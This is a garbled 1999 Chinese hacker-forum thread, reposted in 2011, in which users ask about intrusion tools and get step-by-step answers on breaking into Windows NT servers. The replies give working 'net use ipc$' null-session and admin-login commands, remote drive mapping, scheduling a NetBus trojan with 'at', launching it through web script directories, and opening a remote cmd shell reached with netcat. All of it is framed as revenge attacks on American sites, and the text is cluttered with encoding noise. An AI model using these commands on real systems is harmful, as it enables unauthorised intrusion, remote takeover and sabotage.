《版主頁黑客工具和文章的幾個問題》中提到:7 X& b8 D/ W2 J& f8 t- U
請教��,從版主頁上載得PINGER����,GRINDER�,LETMEIN等,卻不能用����,PINGER安裝后�����,明明安裝前文件有1M多����,但安裝完后生成的文件夾中只有PINGER����。EXE��,40多K�����,運行PINGER��,設(shè)置好IP�,點PING���,彈出一個窗口(C++�。��。�。),說出錯��,然后關(guān)閉了�,何故��,是不是安裝有誤��? 2�����。運行LETMEIN���,彈出以下錯誤:連接文件LETMEIN��。EXE到不存在的NETAPI32���。DLL;NETGROUPGETUSERS�����。 是否說明需要NETAPI32��。DLL文件�����,哪里有該DLL�。 3。USAKILLER 的教學文章中提到需在WINNT4����。0下運行以下步驟等,是否要求我的操作系統(tǒng)也是WINNT4��。0 �,應(yīng)該不是吧? 4。NC FOR NT 是否要求我的操作系統(tǒng)為NT�,還是服務(wù)器的操作系統(tǒng)為NT? 太多的問題需高手回答���,我花那么多的時間和金錢下載這幾M文件卻不能用��,實在窩囊哦�����, 強烈建議USAKILLER 等高手級的黑客寫更多的教學文章��,以提高我國黑客水平�。
, D3 `: s/ z% N% e1 P+ W6 }" q& Y> 我的機子MMX166��,WIN98����,2。5G���,32M內(nèi)存��。
3 G+ B. B$ N1 C) d( E0 g4 @$ g
. f3 _6 _8 @8 Y/ _1 H: M黑客并不神秘����,你只要了解操作系統(tǒng),學習一些操作系統(tǒng)的弱點����,輔助相關(guān)的工具���,就可以成功�。& }$ [4 J. d; H+ C R( |$ Z- X
你的問題是�,pinger, grinder, letmein等工具必須要在NT上運行,我們強烈建議��,你一定要安裝NT�,對于你的機器配制,和我們現(xiàn)在差不多���,只是比你多了32M內(nèi)存���,2G硬盤。
: `2 Z1 S$ m! b6 q其實�,攻擊敵站,利用其操作系統(tǒng)本身的工具就可以了�,比如,我們在NT上攻擊某服務(wù)器,該服務(wù)器為NT4.0���,我們將做如下簡單事情就有可能成功���,假設(shè)目標NT的IP地址為111.111.111.111,做法如下:& B x/ y3 g8 s* \0 q) t. J, o4 k
net use \\111.111.111.111\ipc$ "" /user:""& U0 T5 L- X9 {7 z$ v3 ~$ N4 j! }; ^
net.exe是NT的工具文件����,該命令將和目標服務(wù)器建立Null Session,如果成功�����,你可以查看該服務(wù)器上的共享目錄:
1 l4 A$ k) R( r( n U0 {0 j$ V1 bnet view \\111.111.111.111
9 @; {( Z) ?2 ]當然�����,如果你有該NT管理員密碼�,就更好辦了,假設(shè)其管理員Admin密碼為fuck:4 W. d7 [$ I" B+ [5 h
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"! L @7 ^4 ~" [9 Y& J- ~6 h
命令成功后����,幾乎所有目標NT上的配制,資源���,你都可以在你本地NT上連接遠程計算機來查看或修改:& q' C$ x# U; X. ^
1���、查看或修改遠程機器上的硬盤��,假如目標NT上有C�、D兩個硬盤:
$ f/ V& L2 D. U" |( lnet use x: \\111.111.111.111\c$
* _; O* ?8 B jnet use y: \\111.111.111.111\d$, o9 F7 C+ q! {9 ~! H" S- C/ J- R
這樣���,目標NT上的C、D盤分別被影射為你本地的X�����、Y盤��,你想怎么做都可以...
' o0 W. `# Y. A, z1 q# h3 S. ]2�����、管理目標NT的用戶:
, g5 |( q" }% y5 A7 |從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
$ S% [5 t5 k2 i) @* ^* _3 i- [- Y鍵入\\111.111.111.111后���,目標NT上的所有用戶你想怎么做都可以�,和管理你本地的一樣3 `7 X- N7 I6 O/ ~, H
3�����、管理目標NT的服務(wù)
3 N: b/ q. c* p5 [選擇“管理工具(公用)”->“服務(wù)器管理”->“計算機”->“選擇域”% P4 q; d$ n/ } [4 x+ T. x
這樣你可以管理目標NT上的服務(wù),共享目錄- `3 ^9 n- B: O" b( x1 U0 [
4����、IIS管理
* e+ X" n M7 Z/ ]- Z" f選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
# A, h* ^0 y, t; W1 w5 u$ L目標NT的FTP、WWW服務(wù)你就可以重新配置
2 \7 H7 Z8 C% D j! l5����、事件管理
. s1 a% u- e k1 a“事件查看器”->連接到服務(wù)器->111.111.111.111. ]1 t+ h2 Q) N; j0 W
0 R7 D% y2 P3 Q+ }0 Y- ~8 \ T還有更多的東西,都可以用NT本身的功能來完成����,這些都是95, 98所不能實現(xiàn)的。* }5 v, b# s1 O3 X
! B2 p. |, n/ C0 `
當然����,98,95也能做一些事情,但很麻煩���,比如:
5 G, n7 N0 A* p G q2 bnet use \\111.111.111.111\ipc$7 r9 J- q) A. {
net use z: \\111.111.111.111\d$7 g( M. D6 ~% f/ f/ x) v/ A
但其后不能帶參數(shù)���,即改用其他用戶或密碼,系統(tǒng)將用當前用戶和密碼去登錄��,如果你知道目標NT的用戶或密碼,重新啟動95, 98�,改用該用戶和密碼登錄,方可實現(xiàn)�����,你可以連接目標NT上的共享資源����,但不能進行管理,如用戶�����、事件等3 C2 A* P% Q2 x7 M
- f/ N) G+ C) i$ ]
我們強烈建議各位有心要為死難者報仇���,真正的想黑霉國的站點,花點時間�,裝個NT吧,NT Workstation也可以�!5 L$ u3 A& B* F0 v7 F- F; I
這樣,你還可以了解目標機器上能有什么東東供你去用�����!* Q9 [2 [2 M' x4 z: S/ a. q. Z
( n% {2 B/ |, }) J0 I% ]
" b' A5 z0 q) w1 @--------------------------------------------------------------------------------
% E& a5 `% c: O+ n. _
+ T8 |+ b: _: L/ z( x) `* b% {>quack于1999-06-12,23:37:44 Y) V+ h( o) w
在大作《幾個有關(guān)黑的問題》中提到:6 b- W: i' ?% ]8 W6 v0 g1 r
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項,不知為是何原因?另,用PINGER查詢到的IP地址若無機器名的是否可以直接進入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機的東東上去,而未傳NETBUS,可否直接在其機了運行此東東使其當堂暴斃?--我曾用LEGION上美國機子,但運行程序時卻是在我的機上干活,差點把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!����。
- p0 U4 D$ c l5 g: K
6 R4 l- C* |9 |& A: P( kkillusa于1999-06-13,03:25:15
c' W: d+ G5 L$ i# x在大作《Re: 幾個有關(guān)黑的問題》中提到:. O( q9 a/ s# g1 p! p! s7 s
! b% F8 o7 {) P+ o
letmein.exe 暫時沒有mypwd參數(shù)����,十分抱歉
; W$ |% x8 n# j3 M# B; Epinger程序,只是利用ping來尋找主機���,每臺NT服務(wù)器有一個主IP地址��,但也可以設(shè)置多個輔助IP地址��,比如有些服務(wù)器供應(yīng)商���,一臺NT服務(wù)器上可以設(shè)置一千多個IP,每個IP對應(yīng)一個Hostname,而真正能找到主機名的只有一個IP地址���,就是該主機的主IP地址���,所以有時顯示只有IP,而無主機名�。另外���,有些服務(wù)器是非NT的操作系統(tǒng),有時將不會顯示主機名��。當然���,有時在服務(wù)器上進行一些設(shè)置�����,也會出現(xiàn)上面的情況����。
) w9 P! n" |0 q- w
2 F% O6 N' f: ^; ]# m6 UNetbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個程序�,所以,netbus.exe是不用上傳的�����,只需在目的' K" u+ d% M/ E. F
服務(wù)器上運行ntsrv.exe����,而在目的服務(wù)器運行該程序有很多種方法:
2 b0 h/ x* N* j7 h+ {6 ]# P1 k& s+ F! X
1�、利用服務(wù)器的 Schedule 服務(wù)來啟動schedule 服務(wù)是指在服務(wù)器上定時運行某程序�,具體使用方法���,可在自己的NT Dos窗口下鍵入以下:7 _8 a3 @ t. [! _# R2 l% A2 `
+ g) ~4 n5 F$ c0 b% ~% l; mC:\>net start schedule) I1 j2 x/ d! w6 n2 z: j y0 f* s
Schedule 正在啟動服務(wù).....; m+ g# O( g; L& N5 G( [" u F1 d
Schedulw 服務(wù)啟動成功�����。" c$ V- G2 l$ y. j3 C
C:\>at /?0 Y( c) i1 y/ x( N; v( f: m8 @7 _
AT 命令排定在特定的日期和時間運行某些命令和程序����。
5 Z, ?9 X# }: k# w" f' \$ [% R) X運行 AT 命令之前必須先啟動 Schedule 服務(wù)�����。9 ~: p" a) U( F3 E" @8 r3 ^, a' [
7 l7 w6 v) K9 G# x
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
- w: r4 [; O2 iAT [\\computername] time [/INTERACTIVE]
D* `3 ~- {5 U: M[ /EVERY:date[,...] | /NEXT:date[,...]] "command"" R5 t' m/ Z. r1 d3 w
, E& @) F/ o, g! |7 p3 d) @
\\computername 指定遠程計算機���。 如果省略這個參數(shù)- n# O2 v- M8 z! U3 m: P& V9 ?
命令會被排定在本機上運行��。/ W% y. b) }( ^8 \6 x7 x
id 指定給排定進度命令的識別號���。- c% q. e& q) o9 Z0 m) k# a; T
2 l# E' _. S, I6 [& f/delete 刪除某個已排定進度的命令。如果省略標識�����,計算機上所有已排定進度的命令都會被刪除。
) z4 Z- L: d+ O$ A. S/yes 用于刪除所有作業(yè)����,且不想在運行刪除時顯示確認信息 。
3 i5 a2 e% ?9 h2 U1 G: m( ltime 指定命令運行的時間�。
0 F. k6 H, x7 q, o; {$ {2 W" n) n+ E/interactive 允許作業(yè)在運行時,與用戶通過桌面交互����。
% r8 d$ e. n$ y& q0 t6 ?. K
9 B$ m6 X$ L( g0 @/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運行命令。
) D, [+ S3 k+ L" o6 V如果省略日期���,則默認為在每月的本日運行��。
! j* ^5 R+ j5 P; V9 j1 S2 q* C0 T7 }
/next:date[,...] 指定在下一個指定日期 (如��,下周三)��,運行命令�。如果省略日期�,則默認為在每月的本日運行����。
& C" v+ k- r) R: [
( q+ Z5 ^& M4 }- s, s"command" 準備運行的 Windows NT 命令或批處理文件���。5 c* h4 ~) `. D0 D! a) p
$ F# a/ g, n9 O. `# M8 v
C:\>
/ M1 \& i& q0 J. z5 Y4 d% t' V" g) ]9 Z# z
知道了如何使用AT,再來看看如何在遠程NT上運行ntsrv.exe:' \9 t& ` R6 g1 ~9 _5 B# x
1 利用管理員登陸到目的服務(wù)器����,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
5 [- B4 H/ z* E: F2 ^2 利用ntsrv.exe啟動遠程: netsvc \\x.x.x.x schedule /start
. X$ x O) n, }3 利用AT.EXE在遠程服務(wù)器設(shè)置程序定時運行,當然最快運行最理想�,所以,你可以用letmein.exe得到服務(wù)器的時間���,然后:
/ q d& O+ N& N+ k+ t9 ^at \\x.x.x.x 00:00 ntsrv.exe /port:64321' |+ i4 m* i+ _
其中00:00要改為用letmein.exe得回來的具體時間+一點容量�,等一會后����,再在本地啟動netbus.exe,鍵入目的服務(wù)器得ip地址或hostname�,連接!具體使用可參照 "How to get in nt"�,比如第一種方法,你想要在目的服務(wù)器運行 LEGION��,可以利用netbus得上傳功能��,將LEGION上傳至目的服務(wù)器,再用netbus的"Start program"��,鍵入完整路徑的LEGION運行程序�,就ok了!第二種方法是利用netbus的“App redirect”功能���,啟動遠程telnet服務(wù)����,如下:在netbus中擊“App redirect”�,鍵入"C:\>winnt\system32\cmd.exe",Port為:4321�,服務(wù)就啟動了,然后在本地運行:nc x.x.x.x 4321����,出現(xiàn)dos啟動的畫面就表示連接成功:* s4 B( X/ B: ^; G# t
Microsoft(R) Windows NT(TM)" q# O( ?. ~- J/ K) r; I! b
(C) Copyright 1985-1996 Microsoft Corp.
8 e2 K- @5 t J G$ jC:\>: r; P8 D+ e D! U
; S7 t( P% }4 W+ w3 V' o/ R6 s1 w
2、利用web啟動ntsrv.exe或其他程序在目的服務(wù)器
/ s& D% }) c: V/ K/ v9 [8 c9 B3 K3 s& I
將ntsrv.exe 或其他運行程序Copy到目的服務(wù)器的www可執(zhí)行目錄�����,如cgi-bin或scripts���,然后在瀏覽器鍵入url如:
$ m8 R5 K: C& z% o/ ghttp://x.x.x.x/scripts/ntsrv.exe /port:643216 ?* M, ?# u7 n2 D/ E' D
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321" m0 f) E) n9 h: g5 b9 @9 p& `
該程序就啟動了
$ M4 ~, X: t8 N0 E( r8 q
: f0 _/ v% G+ o, F/ _! U我只提這幾中方法��!
9 }$ u( g2 Z9 P$ n1 f# `要成功�,必須打好基礎(chǔ)工��,對操作系統(tǒng)充分了解!
' e& C* W1 w7 d7 |( v! L+ C
# V& M+ y4 H ^0 \" E# |/ l |
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡